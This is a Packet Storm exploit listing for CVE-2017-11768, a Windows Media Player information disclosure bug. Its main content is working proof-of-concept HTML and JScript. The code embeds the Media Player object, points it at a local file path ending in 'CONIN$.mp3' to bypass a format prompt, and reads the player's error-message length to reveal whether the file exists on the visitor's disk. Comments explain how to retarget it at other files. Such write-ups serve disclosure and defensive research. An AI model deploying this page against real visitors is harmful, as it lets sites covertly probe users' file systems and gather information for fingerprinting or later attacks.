Lucene search

K
packetstormJames LeePACKETSTORM:145549
HistoryDec 26, 2017 - 12:00 a.m.

Windows Media Player Information Disclosure

2017-12-2600:00:00
James Lee
packetstormsecurity.com
25

0.002 Low

EPSS

Percentile

51.4%

`https://www.facebook.com/ExploitWareLabs/posts/1647568611973673  
  
CVE-2017-11768 PoC code:  
  
<b>existing file:</b>  
  
<!-- "existing file:" with a bold tag to present a Windows Media Player mp3  
file is going to test for the presence of files on disk, in our case we are  
detecting cmd.exe binary in system32 folder. -->  
  
<br>  
<br>  
  
<OBJECT id="Player" classid="CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6">  
  
<!-- Instantiating Specific class id - Windows Media Player HTMLView CLSID  
"6BF52A52-394A-11d3-B153-00C04F79FAA6" to embed Windows Media Player. -->  
  
<PARAM NAME="URL" VALUE="file://C://Windows//system32//cmd.exe//CONIN$.mp3">  
  
<!-- Testing for the presence of files on disk via param.url. I added  
"CONIN$.mp3" at the end of VALUE for valid detection, otherwise you'll get  
prompt that says "doesn't match the file format". CONIN$ is a console input  
device, the parameter of well known Windows function CreateFile. CONIN$ is  
reserved name on Windows which mean it's invalid mp3 file name thus  
bypasses prompt that checks extension. You can change param.url to your  
desired file/folder to detect. -->  
  
<param name="captioningID" value="displaylyric" />  
  
<PARAM NAME="autoStart" VALUE="-1">  
  
</OBJECT>  
  
<SCRIPT LANGUAGE = "JScript" FOR = Player EVENT = error()>  
  
if(Player.error.item(0).errorDescription.length==189){  
alert('File not detected.');  
}  
else{  
alert('File detected!');  
}  
</SCRIPT>  
`

0.002 Low

EPSS

Percentile

51.4%